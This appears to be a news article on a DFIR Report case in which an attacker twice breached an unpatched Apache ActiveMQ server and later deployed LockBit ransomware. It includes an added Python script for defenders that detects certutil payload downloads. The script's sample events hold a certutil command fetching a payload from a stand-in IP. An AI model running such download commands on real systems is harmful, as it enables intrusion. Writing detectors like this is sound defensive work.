In the world of cybersecurity, “eviction” is rarely the end of the story. A new case study from The DFIR Report reveals how a persistent threat actor exploited a critical vulnerability in Apache ActiveMQ to breach a corporate network not once, but twice, ultimately deploying LockBit ransomware after being initially kicked out.
The intrusion began in mid-February 2024 when an attacker targeted an internet-facing Apache ActiveMQ server. The vulnerability used, tracked as CVE-2023-46604, is a critical remote code execution (RCE) flaw that has become a favorite for ransomware operators.
“The threat actor was able to perform remote code execution (RCE) by using a Java Spring class and a custom Java Spring bean configuration XML file,” the report details. Using the Windows CertUtil utility, the malicious XML file downloaded a payload from a remote server, giving the attacker their first foothold.
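The CertUtil download stage described above leaves a distinctive process-creation trace that defenders can alert on. The following detection sketch is an added example, not code from The DFIR Report or from any vendor. It assumes process-creation events shaped like Sysmon Event ID 1 (parent image, image, command line) and assumes the ActiveMQ broker runs under java.exe, so a certutil.exe download spawned by java.exe is rated high severity; the sample events and the 198.51.100.10 address are constructed.

```python
"""Flag certutil.exe being used as a downloader, with extra weight when the
parent is the Java process hosting ActiveMQ (assumption: broker runs as java.exe)."""
import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class ProcEvent:
    # Field names loosely follow Sysmon Event ID 1 (assumption, not from the report)
    parent_image: str
    image: str
    command_line: str


# Matches the first http(s) URL on the command line
URL_RE = re.compile(r"""https?://[^\s"']+""", re.IGNORECASE)

# certutil switches that fetch content from a URL (real switches, not from the page)
DOWNLOAD_SWITCHES = ("urlcache", "verifyctl")


def basename(path: str) -> str:
    """Normalise a Windows or POSIX path to its lower-cased file name."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcEvent) -> Optional[dict]:
    """Return a finding dict if the event is a certutil download, else None."""
    if basename(ev.image) != "certutil.exe":
        return None
    cmd = ev.command_line.lower()
    if not any(sw in cmd for sw in DOWNLOAD_SWITCHES):
        return None  # hashing, cert store queries etc. are normal admin use
    m = URL_RE.search(ev.command_line)
    if not m:
        return None
    parent = basename(ev.parent_image)
    # A web-exposed Java service spawning certutil with a URL is the ActiveMQ
    # RCE pattern; from an interactive shell it is still worth a look.
    severity = "high" if parent == "java.exe" else "medium"
    return {"severity": severity, "parent": parent, "url": m.group(0)}


def scan(events):
    """Return (index, finding) pairs for every event that classifies as suspicious."""
    results = []
    for i, ev in enumerate(events):
        finding = classify(ev)
        if finding:
            results.append((i, finding))
    return results


# Constructed sample telemetry (not from the incident)
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Java\jdk\bin\java.exe",
              r"C:\Windows\System32\certutil.exe",
              "certutil -urlcache -split -f http://198.51.100.10/payload.bin payload.bin"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\certutil.exe",
              r"certutil -hashfile C:\Users\admin\setup.exe SHA256"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\certutil.exe",
              "certutil -urlcache -split -f https://example.invalid/notes.txt notes.txt"),
    ProcEvent(r"C:\Program Files\Java\jdk\bin\java.exe",
              r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c whoami"),
]


if __name__ == "__main__":
    for idx, f in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {f['severity']} - certutil download from {f['parent']} -> {f['url']}")
```

The parent-process condition is what turns a noisy "certutil with a URL" rule into a precise one for this scenario: a message broker has no business launching a certificate utility to fetch files, so that single pairing is worth an immediate page even before the payload is analysed.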
While the organization’s security team identified and evicted the intruder after the first attempt, they failed to seal the vulnerability.
“Despite being evicted after the initial intrusion, they successfully breached the same server on a second occasion 18 days later,” the researchers observed. This second entry was the beginning of a rapid escalation.
Armed with a fresh connection, the actor utilized Metasploit and Meterpreter to burrow deeper into the environment. They successfully escalated privileges, accessed LSASS process memory to harvest credentials, and moved laterally across the network.
With the network mapped and credentials in hand, the threat actor “swiftly transitioned to deploying ransomware”. Using the Remote Desktop Protocol (RDP) and the stolen credentials, they distributed the encryption payload across the environment.
The ransomware used was a variant of LockBit Black (also known as LockBit 3.0). Interestingly, the investigators concluded that this was likely an independent operator rather than the core LockBit group. “The ransom note did not follow the normal LockBit format directing victims to a Tor leak site or TOX/Jabber communications; instead, it instructed them to download and use the Session private messaging application,” the report notes.
This led researchers to assess that the activity was “conducted by an independent threat actor using the leaked builder to operate their own ransomware campaign”.
The attackers attempted to soften the blow with a surprisingly professional ransom note. “Compared to other ransomware we charge a lot less, so don’t be stingy!” the note read. They even offered a “security audit” as part of the payment package: “We will also let you know about the vulnerability in your servers that we used to infiltrate your network. We work honesty!”.

While the threat actor was “evicted,” the root cause—the unpatched Apache ActiveMQ server—allowed for an identical re-entry less than three weeks later. Organizations are urged to prioritize the patching of internet-facing applications and to treat every “eviction” as a temporary measure until the vulnerability is permanently closed.